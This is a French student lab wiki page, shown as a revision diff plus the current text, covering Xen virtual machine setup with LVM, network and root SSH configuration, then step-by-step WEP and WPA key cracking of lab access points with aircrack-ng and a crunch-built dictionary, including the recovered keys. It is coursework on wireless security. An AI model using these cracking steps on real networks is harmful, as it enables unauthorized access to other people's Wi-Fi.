TP sysres IMA2a5 2021/2022 G1 : Différence entre versions

De Wiki d'activités IMA
(Configuration DNS)
 
Ligne 106 : Ligne 106 :
  
 
malheureusement il n'y avait plus assez d'argent sur la carte pour que je puisse acheter le nom de domaine...
 
malheureusement il n'y avait plus assez d'argent sur la carte pour que je puisse acheter le nom de domaine...
 +
 +
 +
== Craquage de clés ==
 +
 +
====Craquage clé WEP====
 +
 +
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
 +
 +
Tout d'abord, on installe l'utilitaire aircrack-ng
 +
 +
  su -
 +
  apt install aircrack-ng
 +
 +
On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :
 +
 +
  lsusb
 +
 +
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
 +
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
 +
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
 +
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
 +
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
 +
Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard
 +
Bus 001 Device 007: ID 413c:301a Dell Computer Corp.
 +
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
 +
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
 +
 +
La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
 +
 +
On récupère le nom de l'interface de la clé Wifi :
 +
 +
airmon-ng
 +
 +
 +
On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :
 +
 +
  airmon-ng start wlx40a5ef059e47
 +
 +
On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:
 +
 +
  airodump-ng wlan0mon
 +
 +
On obtient alors les informations suivantes :
 +
 +
BSSID                PWR    Beacons    #Data,  #/s      CH      MB      ENC    CIPHER  AUTH ESSID
 +
04:DA:D2:9C:50:50    -40          2      3      4        3      54e      WEP    WEP        cracotte01
 +
 +
On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :
 +
 +
airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon
 +
 +
On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :
 +
 +
  aircrack-ng lcrack-01.cap
 +
 +
Après 5-10min, on obtient le code de la clé Wifi :
 +
 +
                                    Aircrack-ng 1.5.2
 +
 +
 +
                      [00:00:00] Tested 721 keys (got 665952 IVs)
 +
 +
  KB    depth  byte(vote)
 +
    0    1/  2  27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896)
 +
    1    2/  1  D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224)
 +
    2    1/  3  9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640)
 +
    3    1/  5  BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296)
 +
    4  13/  4  35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568)
 +
 +
            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ]
 +
Decrypted correctly: 100%
 +
 +
====Craquage clé WPA====
 +
 +
On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :
 +
 +
apt-get install aircrack-ng
 +
 +
Listing de toutes les interfaces Wi-Fi
 +
 +
airmon-ng
 +
 +
On obtient la liste ci-dessous :
 +
 +
PHY Interface   Driver   Chipset
 +
phy0 wlx40a5ef059e47   rt2800usb      Ralink Technology, Corp. RT5370
 +
 +
On passe la carte Wifi en mode monitor :
 +
 +
airmon-ng start wlx40a5ef059e47
 +
 +
On observe les trames de réseaux avec la commande :
 +
 +
airodump-ng wlan0mon
 +
 +
On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8
 +
On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :
 +
 +
airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon
 +
 +
On attend environ 1/4 d'heure pour récupérer suffisamment de trames.
 +
 +
Exécution de Aircrack :
 +
 +
On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels.
 +
On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :
 +
 +
crunch 8 8 0123456789 >> dico.txt
 +
 +
Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :
 +
 +
split -b 200m dico.txt
 +
 +
On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés
 +
 +
ls
 +
>> xaa
 +
>> xab
 +
>> xac
 +
>> xad
 +
>> xae
 +
 +
Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.
 +
 +
Cassage de la clef WPA :
 +
 +
aircrack-ng -w xaa krakotte01.cap
 +
 +
aircrack-ng -w xab krakotte01.cap
 +
 +
aircrack-ng -w xac krakotte01.cap
 +
 +
aircrack-ng -w xad krakotte01.cap
 +
 +
aircrack-ng -w xae krakotte01.cap
 +
 +
Résultat :
 +
                            Aircrack-ng 1.5.2
 +
 +
    [08:04:01] 66637843/102795810 keys tested (958.44 k/s)
 +
 +
    Time left: 10 hours, 29 minutes, 3 seconds                64.83%
 +
 +
                        KEY FOUND! [ 66601666 ]
 +
 +
    Master Key    : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45
 +
                    18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5
 +
 +
    Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20
 +
                    59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70
 +
                    B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41
 +
                    18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5
 +
 +
    EAPOL HMAC    : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10

Version actuelle datée du 3 décembre 2021 à 00:58

 --- Logical volume ---
 LV Path                /dev/virtual/BarbieGirl1
 LV Name                BarbieGirl1
 VG Name                virtual
 LV UUID                rnEH8P-wgYP-Gvwx-En0B-wbge-7hfh-SmBtUx
 LV Write Access        read/write
 LV Creation host, time capbreton, 2021-09-24 09:35:14 +0200
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               2
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:61

Installation de la machine virtuelle

Connexion sur le disque de virtualisation

su -
ssh -4 capbreton.plil.info

Installation dans la machine virtuelle Xen

Création de la machine virtuelle :

xen-create-image --hostname=BarbieGirl --ip=193.48.57.161 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster

Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :

tail -f /var/log/xen-tools/BarbieGirl.log

Vérifier la création de la MV en se rendant sur les répertoires:

ls /etc/xen
ls /usr/local/xen

Pour les disques : configuration RAID 5 Administration de volume logique :

lvcreate -L1G -n BarbieGirl1
lvcreate -L1G -n BarbieGirl2
lvcreate -L1G -n BarbieGirl3
lvcreate -L1G -n BarbieGirl4

Les volumes logiques sont par défaut de 1GiB. Augmenter la taille des volumes logiques:

lvextend -L +9G /dev/virtual/BarbieGirl1
lvextend -L +9G /dev/virtual/BarbieGirl2
lvextend -L +9G /dev/virtual/BarbieGirl3
lvextend -L +9G /dev/virtual/BarbieGirl4

Vérifier avec :

lvdisplay

Créer un système de fichiers étendu :

mke2fs /dev/virtual/BarbieGirl1
mke2fs /dev/virtual/BarbieGirl2
mke2fs /dev/virtual/BarbieGirl3
mke2fs /dev/virtual/BarbieGirl4

Création et modification du fichier de configuration :

xen create /etc/xen/BarbieGirl.cfg
vim BarbieGirl.cfg

Lancer la MV avec la commande :

xen create /etc/xen/BarbieGirl.cfg

On peut vérifier que la MV est démarrée avec la commande :

xl list


Configuration réseau

On modifie le fichier interface pour permettre à la machine virtuelle d'accéder à internet :

nano /etc/networks/interfaces 
# The primary network interface
auto eth0
iface eth0 inet6 auto
iface eth0 inet static
 address 10.60.100.161/24
 up ip address add dev eth0 193.48.57.161/32 ; ip route add default via 10.60.100.254 src 193.48.57.161
 down ip address del dev eth0 193.48.57.161/32 ; ip route del default via 10.60.100.254 src 193.48.57.161

Pour actualiser la configuration réseau on fais les commandes suivantes :

ifdown eth0
ifup eth0

Configuration ssh

Pour accéder à la machine virtuelle par ssh, on modifie le fichier suivant :

nano /etc/ssh/sshd_config
PermitRootLogin yes

Relancer le service ssh :

service ssh restart

On accède désormais à la machine virtuelle par la commande :

ssh root@193.48.57.161

Configuration DNS

J'ai voulu acheter le nom de domaine barbiegirl.store sur gandi.net

malheureusement il n'y avait plus assez d'argent sur la carte pour que je puisse acheter le nom de domaine...


Craquage de clés

Craquage clé WEP

Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".

Tout d'abord, on installe l'utilitaire aircrack-ng

 su -
 apt install aircrack-ng

On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :

 lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard
Bus 001 Device 007: ID 413c:301a Dell Computer Corp. 
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

On récupère le nom de l'interface de la clé Wifi :

airmon-ng 


On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :

 airmon-ng start wlx40a5ef059e47

On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:

 airodump-ng wlan0mon

On obtient alors les informations suivantes :

BSSID                 PWR     Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID
04:DA:D2:9C:50:50     -40           2      3       4        3      54e      WEP     WEP         cracotte01

On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :

airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon

On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :

 aircrack-ng lcrack-01.cap

Après 5-10min, on obtient le code de la clé Wifi :

                                   Aircrack-ng 1.5.2 


                      [00:00:00] Tested 721 keys (got 665952 IVs)

  KB    depth   byte(vote)
   0    1/  2   27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 
   1    2/  1   D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 
   2    1/  3   9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 
   3    1/  5   BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 
   4   13/  4   35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) 

            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] 

Decrypted correctly: 100%

Craquage clé WPA

On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :

apt-get install aircrack-ng

Listing de toutes les interfaces Wi-Fi

airmon-ng

On obtient la liste ci-dessous :

PHY	Interface	  Driver	  Chipset
phy0	wlx40a5ef059e47	  rt2800usb       Ralink Technology, Corp. RT5370 

On passe la carte Wifi en mode monitor :

airmon-ng start wlx40a5ef059e47	

On observe les trames de réseaux avec la commande :

airodump-ng wlan0mon

On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8 On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :

airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon

On attend environ 1/4 d'heure pour récupérer suffisamment de trames.

Exécution de Aircrack :

On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels. On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :

crunch 8 8 0123456789 >> dico.txt

Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :

split -b 200m dico.txt

On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés

ls
>> xaa
>> xab
>> xac
>> xad
>> xae

Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.

Cassage de la clef WPA :

aircrack-ng -w xaa krakotte01.cap
aircrack-ng -w xab krakotte01.cap
aircrack-ng -w xac krakotte01.cap
aircrack-ng -w xad krakotte01.cap
aircrack-ng -w xae krakotte01.cap

Résultat :

                           Aircrack-ng 1.5.2 

   [08:04:01] 66637843/102795810 keys tested (958.44 k/s) 

   Time left: 10 hours, 29 minutes, 3 seconds                64.83%

                        KEY FOUND! [ 66601666 ]

   Master Key     : 43 33 CD 6B EA 53 29 36 F9 53 21 00 33 0A 1A 45 
                    18 E3 D5 1D DD 1C 37 29 B9 6B 49 32 24 80 02 E5 

   Transient Key  : 77 A3 E9 BF CE FD D1 2B D9 62 3B 15 3C D5 2C 20 
                    59 59 19 3E AF 62 8F C9 1A 48 9C 1B 4B A4 89 70 
                    B3 4C 79 2A 0A FB C9 71 1F 10 01 BE A5 FA 96 41 
                    18 04 12 0E 01 91 DD EA B2 96 17 F3 69 AC 7C F5 

   EAPOL HMAC     : DA 48 8D 5E B4 0E F9 78 63 C7 8E 01 56 40 82 10